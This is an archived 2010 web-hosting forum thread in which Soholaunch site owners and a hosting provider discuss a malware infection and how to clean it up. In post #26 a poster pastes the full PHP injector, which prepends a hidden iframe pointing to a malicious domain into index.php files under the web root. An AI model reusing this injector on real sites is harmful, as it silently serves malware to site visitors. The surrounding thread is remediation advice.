

"Trojan Horse"
#21
Posted 22 June 2010 - 08:39 AM

Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery
#22
Posted 22 June 2010 - 03:47 PM
(If you have access to the server, ConfigServer Firewall has Directory and file watching capability with reports if a watched directory or a file changes.)
█ DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
Please note that DrakNet no longer offers licensed Soholaunch as of 9/1/2010 - if you are looking at an old forum post that recommends us as a Soholaunch host, please note that situation has changed since the post was made.
#23
Posted 22 June 2010 - 10:41 PM
#24
Posted 23 June 2010 - 08:59 AM

Changing the perms on the file doesn't seem to have compromised the site's functionality at all, so maybe I'll ask my man to let me have some of his logs!!
Don't ask, don't get

Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery
#25
Posted 07 July 2010 - 10:28 AM

Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery
#26
Posted 16 July 2010 - 09:48 PM
<?$sInjectPHP = "<iframe src=\"http://karatepacan.co.cc/up/go.php?sid=2\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>"?><?
$iMaxDepth = 4;
$iCurrDepth = 0;
$sDir = $_SERVER['DOCUMENT_ROOT'].'/';
Infect($sDir);
function Infect($sDir)
{
global $iCurrDepth;
global $iMaxDepth;
global $sInjectPHP;
global $sInjectHTML;
global $sLog;
if(file_exists($sDir) and $hDir = @opendir($sDir))
{
while(($sFileName = readdir($hDir)))
{
if(is_file($sDir.$sFileName))
{
$sExtension = substr($sFileName, strrpos($sFileName, '.')+1);
switch($sExtension)
{
case 'php':
if($sFileName == 'index.php')
{
$sFile = file_get_contents($sDir.$sFileName);
$sFile = '<body>'.$sInjectPHP.'</body>'.$sFile;
file_put_contents($sDir.$sFileName, $sFile);
}
break;
/*case 'htm':
case 'html':
chmod($sDir.$sFileName, 666);
$sFile = file_get_contents($sDir.$sFileName);
$iPos = stripos($sFile, '</body>');
if($iPos) $sFile = substr($sFile, 0, $iPos).$sInjectHTML.substr($sFile, $iPos);
else $sFile .= $sInjectHTML;
file_put_contents($sDir.$sFileName, $sFile);
break;*/
}
}
/*else if (is_dir($sDir.$sFileName) && $sFileName != '.' &&
$sFileName != '..' && $iCurrDepth <= $iMaxDepth)
{
$iCurrDepth++;
Infect($sDir.$sFileName.'/');
$iCurrDepth--;
}*/
}
closedir($hDir);
}
}
?>
#27
Posted 16 July 2010 - 09:51 PM
If you do have a server, contact soho, they have a patch script you can run to mass patch all without upgrading.
█ DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
Please note that DrakNet no longer offers licensed Soholaunch as of 9/1/2010 - if you are looking at an old forum post that recommends us as a Soholaunch host, please note that situation has changed since the post was made.
#28
Posted 18 July 2010 - 08:57 PM
#29
Posted 20 July 2010 - 12:34 AM
should there be a photo.php in media folder or elsewhere? If so where can I find a clean one?
Tks.
Daniel
#30
Posted 21 July 2010 - 01:57 PM
#31
Posted 21 July 2010 - 06:36 PM
I would suggest, if folks have not, that they:
Get an Account with Google Webmaster tools: Google Webmaster Central now
Verify their site
Make sure it has not been picked up yet as malware infected.
Check with your host regarding their malware infection policies - some hosts get Google notices and you are suspended or terminated, so find out before you get caught what your host's policy is.
We'll have a blog post up regarding this issue to our specific customers within an hour or two.
█ DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
Please note that DrakNet no longer offers licensed Soholaunch as of 9/1/2010 - if you are looking at an old forum post that recommends us as a Soholaunch host, please note that situation has changed since the post was made.
#32
Posted 25 July 2010 - 09:31 PM
#33
Posted 26 July 2010 - 09:37 AM
Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery
#34
Posted 26 July 2010 - 08:02 PM
My site built with soho launch has also just been infected with malware from klezmoo.co.cc updates java script even if not requested when entering site. Google alert coming up but on link sent by host company it went straight in and started downloading. Any one got any idea how to fix it with out closing site?
If your site is hacked now, and serving malicious software, you need to take that site offline *now* - not when you figure out how to clean it, not in a few days, now. You are potentially infecting your clients and visitors, if you take credit cards, potentially opening your site up to hefty PCI fines.
The easiest way to take a site offline for a user is to rename public_html, create a new public_html directory, and upload a page explaining that you are offline for maintenance. Then you can reinstall a current version of Soholaunch that doesn't have the hole in it, upload a backup (if you're sure it's clean), and be back and business with a minimum of fuss (making sure to change all the logins).
If you don't have a clean backup (or any backup at all), you have a pretty large problem and may have to rebuild.
█ DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
Please note that DrakNet no longer offers licensed Soholaunch as of 9/1/2010 - if you are looking at an old forum post that recommends us as a Soholaunch host, please note that situation has changed since the post was made.
#35
Posted 19 November 2010 - 07:10 AM
This is a good post,i like it very much,i hope that you can creat more post like this.best wishes.
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users